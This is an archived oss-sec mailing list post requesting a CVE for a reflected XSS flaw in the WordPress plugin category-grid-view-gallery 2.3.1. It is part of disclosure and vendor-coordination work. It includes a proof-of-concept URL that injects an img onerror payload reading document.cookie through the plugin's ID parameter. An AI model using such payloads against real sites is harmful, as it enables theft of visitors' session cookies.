oss-sec mailing list archives

CVE request: WordPress plugin category-grid-view-gallery XSS

From: Henri Salo <henri () nerv fi>
Date: Thu, 11 Jul 2013 05:12:15 +0300

Can I get 2013 CVE identifier for XSS vulnerability in WordPress plugin
category-grid-view-gallery, thanks.

Plugin page: http://wordpress.org/plugins/category-grid-view-gallery/
Original advisory: http://seclists.org/bugtraq/2013/Jul/17
Version affected: 2.3.1 (older probably affected too)
PoC: 
https://example.com/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=44%22%3E%3Cimg%20src=%22http://%22%20onerror=alert%28document.cookie%29;%3E

Not yet fixed as author did not contact vendor. Top 1277 plugin by popularity.
WordPress guys could you coordinate this with plugin developer, thanks?

---
Henri Salo

Attachment: signature.asc
Description: Digital signature

Current thread:

CVE request: WordPress plugin category-grid-view-gallery XSS Henri Salo (Jul 10)
- Re: CVE request: WordPress plugin category-grid-view-gallery XSS Kurt Seifried (Jul 11)
  - Re: CVE request: WordPress plugin category-grid-view-gallery XSS Henri Salo (Jul 11)
    - Re: CVE request: WordPress plugin category-grid-view-gallery XSS Kurt Seifried (Jul 11)